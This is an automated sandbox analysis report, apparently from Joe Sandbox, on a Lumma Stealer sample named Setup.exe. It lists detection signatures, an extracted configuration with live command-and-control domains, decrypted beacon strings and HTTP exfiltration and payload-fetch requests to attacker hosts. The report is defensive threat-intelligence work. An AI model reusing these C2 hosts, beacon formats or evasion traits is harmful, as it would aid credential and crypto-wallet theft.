
Windows Analysis Report
Setup.exe

Overview

General Information

Sample name: Setup.exe
Analysis ID: 1584525
MD5: 2fbed9c7f4e671459ba52391d1d2975d
SHA1: 89e3ebc3fb946566a77bb1359d0f43eded9ff3a2
SHA256: 0f17388ac1220dcb7bcb2889e16bb21fae876045a55079a572057c75fa2d2067
Tags: exe, LummaStealer, user-aachum

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected potential crypto function
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Setup.exe (PID: 6576 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: 2FBED9C7F4E671459BA52391D1D2975D)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["tirepublicerj.shop", "wholersorie.shop", "cloudewahsj.shop", "framekgirus.shop", "rabidcowse.shop", "noisycuttej.shop", "abruptyopsn.shop", "nearycrepso.shop", "displayclubby.sbs"], "Build id": "hRjzG3--GAS"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown | 0x53d65:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Process Memory Space: Setup.exe PID: 6576 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: Setup.exe PID: 6576 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: Setup.exe PID: 6576 | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: Setup.exe PID: 6576 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |
              No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-05T18:58:13.957384+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49721 | 104.21.64.1 | 443 | TCP
2025-01-05T18:58:15.214340+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49722 | 104.21.64.1 | 443 | TCP
2025-01-05T18:58:16.373395+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49723 | 104.21.64.1 | 443 | TCP
2025-01-05T18:58:17.512468+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49724 | 104.21.64.1 | 443 | TCP
2025-01-05T18:58:18.684917+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49725 | 104.21.64.1 | 443 | TCP
2025-01-05T18:58:20.350470+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49728 | 104.21.64.1 | 443 | TCP
2025-01-05T18:58:22.150236+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49731 | 104.21.64.1 | 443 | TCP
2025-01-05T18:58:23.191474+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49742 | 104.21.64.1 | 443 | TCP
2025-01-05T18:58:24.491158+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49748 | 185.161.251.21 | 443 | TCP
2025-01-05T18:58:14.714158+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49721 | 104.21.64.1 | 443 | TCP
2025-01-05T18:58:15.710485+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49722 | 104.21.64.1 | 443 | TCP
2025-01-05T18:58:23.623861+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49742 | 104.21.64.1 | 443 | TCP
2025-01-05T18:58:14.714158+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49721 | 104.21.64.1 | 443 | TCP
2025-01-05T18:58:15.710485+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.5 | 49722 | 104.21.64.1 | 443 | TCP
2025-01-05T18:58:20.812695+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49728 | 104.21.64.1 | 443 | TCP


              AV Detection

Source: https://klipvumisui.shop/int_clp_sha.txtp; Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/int_clp_sha.txtds; Avira URL Cloud: Label: malware
Source: https://cegu.shop/8574262446/ph.txt1eNI; Avira URL Cloud: Label: malware
Source: https://cegu.shop/Q; Avira URL Cloud: Label: malware
Source: https://cegu.shop/8574262446/ph.txtMhNf; Avira URL Cloud: Label: malware
Source: https://cegu.shop/8574262446/ph.txtebKit/537.36; Avira URL Cloud: Label: malware
Source: https://cegu.shop/8574262446/ph.txtl; Avira URL Cloud: Label: malware
Source: Setup.exe.6576.0.memstrmin; Malware Configuration Extractor: LummaC {"C2 url": ["tirepublicerj.shop", "wholersorie.shop", "cloudewahsj.shop", "framekgirus.shop", "rabidcowse.shop", "noisycuttej.shop", "abruptyopsn.shop", "nearycrepso.shop", "displayclubby.sbs"], "Build id": "hRjzG3--GAS"}
Source: Setup.exe; ReversingLabs: Detection: 21%
Source: Setup.exe; Virustotal: Detection: 19%
Source: 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmp; String decryptor: cloudewahsj.shop
Source: 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmp; String decryptor: rabidcowse.shop
Source: 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmp; String decryptor: noisycuttej.shop
Source: 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmp; String decryptor: tirepublicerj.shop
Source: 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmp; String decryptor: framekgirus.shop
Source: 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmp; String decryptor: wholersorie.shop
Source: 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmp; String decryptor: abruptyopsn.shop
Source: 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmp; String decryptor: nearycrepso.shop
Source: 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmp; String decryptor: displayclubby.sbs
Source: 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmp; String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmp; String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmp; String decryptor: - Screen Resoluton:
Source: 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmp; String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmp; String decryptor: Workgroup: -
Source: 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmp; String decryptor: hRjzG3--GAS
Source: Setup.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown; HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49742 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.5:49748 version: TLS 1.2

              Networking

Source: Network traffic; Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49721 -> 104.21.64.1:443
Source: Network traffic; Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49722 -> 104.21.64.1:443
Source: Network traffic; Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49721 -> 104.21.64.1:443
Source: Network traffic; Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49722 -> 104.21.64.1:443
Source: Network traffic; Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49728 -> 104.21.64.1:443
Source: Network traffic; Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49742 -> 104.21.64.1:443
Source: Malware configuration extractor; URLs: tirepublicerj.shop
Source: Malware configuration extractor; URLs: wholersorie.shop
Source: Malware configuration extractor; URLs: cloudewahsj.shop
Source: Malware configuration extractor; URLs: framekgirus.shop
Source: Malware configuration extractor; URLs: rabidcowse.shop
Source: Malware configuration extractor; URLs: noisycuttej.shop
Source: Malware configuration extractor; URLs: abruptyopsn.shop
Source: Malware configuration extractor; URLs: nearycrepso.shop
Source: Malware configuration extractor; URLs: displayclubby.sbs
Source: Joe Sandbox View; IP Address: 185.161.251.21
Source: Joe Sandbox View; IP Address: 104.21.64.1
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View; JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49723 -> 104.21.64.1:443
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49731 -> 104.21.64.1:443
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49742 -> 104.21.64.1:443
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49721 -> 104.21.64.1:443
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49725 -> 104.21.64.1:443
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49722 -> 104.21.64.1:443
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49724 -> 104.21.64.1:443
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49728 -> 104.21.64.1:443
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49748 -> 185.161.251.21:443
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: displayclubby.sbs
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 77 | Host: displayclubby.sbs
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=EH35OOWNHHMN | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12797 | Host: displayclubby.sbs
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=J2C6QZYMBGK69XZRAJU | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15081 | Host: displayclubby.sbs
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=QH87QAR8H | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20511 | Host: displayclubby.sbs
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=V39DKRJ9WNME5J8KZ2 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 976 | Host: displayclubby.sbs
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=DCMRVADM4YO11P | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1074 | Host: displayclubby.sbs
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 112 | Host: displayclubby.sbs
Source: global traffic; HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: cegu.shop
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: cegu.shop
Source: global traffic; DNS traffic detected: DNS query: displayclubby.sbs
Source: global traffic; DNS traffic detected: DNS query: cegu.shop
Source: unknown; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: displayclubby.sbs
Source: Setup.exe, 00000000.00000003.2185680274.00000000036C6000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Setup.exe, 00000000.00000003.2185680274.00000000036C6000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Setup.exe; String found in binary or memory: http://certificates.starfieldtech.com/repository/1604
Source: Setup.exe, 00000000.00000003.2185680274.00000000036C6000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Setup.exe; String found in binary or memory: http://crl.starfieldtech.com/repository/0
Source: Setup.exe; String found in binary or memory: http://crl.starfieldtech.com/repository/sfsroot.crl0P
Source: Setup.exe; String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: Setup.exe, 00000000.00000003.2185680274.00000000036C6000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Setup.exe, 00000000.00000003.2185680274.00000000036C6000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Setup.exe, 00000000.00000003.2185680274.00000000036C6000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Setup.exe, 00000000.00000003.2185680274.00000000036C6000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: Setup.exe, 00000000.00000003.2185680274.00000000036C6000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ocsp.digicert.com0
Source: Setup.exe, 00000000.00000003.2185680274.00000000036C6000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Setup.exe; String found in binary or memory: http://ocsp.starfieldtech.com/0D
Source: Setup.exe; String found in binary or memory: http://ocsp.thawte.com0
Source: Setup.exe; String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: Setup.exe; String found in binary or memory: http://s2.symcb.com0
Source: Setup.exe; String found in binary or memory: http://sf.symcb.com/sf.crl0f
Source: Setup.exe; String found in binary or memory: http://sf.symcb.com/sf.crt0
Source: Setup.exe; String found in binary or memory: http://sf.symcd.com0&
Source: Setup.exe; String found in binary or memory: http://sv.symcb.com/sv.crl0W
Source: Setup.exe; String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: Setup.exe; String found in binary or memory: http://sv.symcd.com0&
Source: Setup.exe; String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: Setup.exe; String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: Setup.exe; String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: Setup.exe; String found in binary or memory: http://www.innosetup.com/
Source: Setup.exe; String found in binary or memory: http://www.remobjects.com/ps
Source: Setup.exe; String found in binary or memory: http://www.symauth.com/cps0(
Source: Setup.exe; String found in binary or memory: http://www.symauth.com/rpa00
Source: Setup.exe, 00000000.00000003.2185680274.00000000036C6000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://x1.c.lencr.org/0
Source: Setup.exe, 00000000.00000003.2185680274.00000000036C6000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://x1.i.lencr.org/0
Source: Setup.exe, 00000000.00000003.2162858016.000000000364A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2163006437.0000000003649000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2162927299.0000000003647000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Setup.exe, 00000000.00000003.2162858016.000000000364A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2163006437.0000000003649000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2162927299.0000000003647000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Setup.exe, 00000000.00000002.4466727451.00000000006F4000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://cegu.shop/
Source: Setup.exe, 00000000.00000002.4466727451.00000000006F4000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://cegu.shop/8574262446/ph.txt
Source: Setup.exe, 00000000.00000002.4466727451.00000000006F4000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://cegu.shop/8574262446/ph.txt1eNI
Source: Setup.exe, 00000000.00000002.4466727451.00000000006F4000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://cegu.shop/8574262446/ph.txtMhNf
Source: Setup.exe, 00000000.00000002.4468527188.0000000002ABB000.00000004.00000010.00020000.00000000.sdmp; String found in binary or memory: https://cegu.shop/8574262446/ph.txtebKit/537.36
Source: Setup.exe, 00000000.00000003.2252229474.000000000073E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4467113114.0000000000739000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://cegu.shop/8574262446/ph.txtl
Source: Setup.exe, 00000000.00000002.4466727451.00000000006F4000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://cegu.shop/Q
Source: Setup.exe, 00000000.00000003.2162858016.000000000364A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2163006437.0000000003649000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2162927299.0000000003647000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Setup.exe, 00000000.00000003.2162858016.000000000364A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2163006437.0000000003649000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2162927299.0000000003647000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Setup.exe; String found in binary or memory: https://d.symcb.com/cps0%
Source: Setup.exe; String found in binary or memory: https://d.symcb.com/rpa0
Source: Setup.exe, 00000000.00000002.4466727451.000000000071F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2252229474.0000000000737000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2852575069.000000000071B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4467113114.0000000000739000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4468769153.0000000003718000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://dfgh.online/invoker.php?compName=
Source: Setup.exe, Setup.exe, 00000000.00000002.4467465356.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4466727451.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2219391647.0000000000775000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2151792860.000000000073D000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2852643199.000000000079D000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2252229474.0000000000775000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2231452822.0000000000793000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2252135064.0000000000793000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2173869381.0000000003687000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2252135064.000000000079E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2174049537.000000000368A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2852643199.000000000078F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2219391647.000000000079E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4467113114.0000000000778000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2161734464.0000000000775000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4467465356.0000000000790000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://displayclubby.sbs/
Source: Setup.exe, 00000000.00000003.2202431157.000000000079A000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://displayclubby.sbs/&&8
Source: Setup.exe, 00000000.00000003.2151792860.000000000073D000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://displayclubby.sbs/)
Source: Setup.exe, 00000000.00000002.4467465356.0000000000790000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2231452822.0000000000736000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://displayclubby.sbs/api
Source: Setup.exe, 00000000.00000003.2151792860.000000000073D000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2161734464.0000000000769000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://displayclubby.sbs/api$
Source: Setup.exe, 00000000.00000003.2151792860.000000000073D000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2161734464.000000000077F000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://displayclubby.sbs/api;
Source: Setup.exe, 00000000.00000003.2151792860.000000000073D000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://displayclubby.sbs/apiJg
Source: Setup.exe, 00000000.00000003.2231452822.0000000000775000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2151792860.000000000073D000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2161734464.0000000000775000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://displayclubby.sbs/q
Source: Setup.exe, 00000000.00000003.2185440427.0000000003612000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2185774111.0000000003612000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://displayclubby.sbs:443/api
Source: Setup.exe, 00000000.00000003.2162858016.000000000364A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2162927299.0000000003647000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Setup.exe, 00000000.00000003.2162858016.000000000364A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2162927299.0000000003647000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Setup.exe, 00000000.00000003.2162858016.000000000364A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2162927299.0000000003647000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Setup.exe, 00000000.00000002.4467423861.0000000000784000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2252135064.0000000000784000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt
Source: Setup.exe, 00000000.00000002.4467423861.0000000000784000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2252135064.0000000000784000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtds
Source: Setup.exe, 00000000.00000002.4467423861.0000000000784000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2252135064.0000000000784000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtp
Source: Setup.exe, 00000000.00000003.2186564595.000000000393C000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Setup.exe, 00000000.00000003.2186564595.000000000393C000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
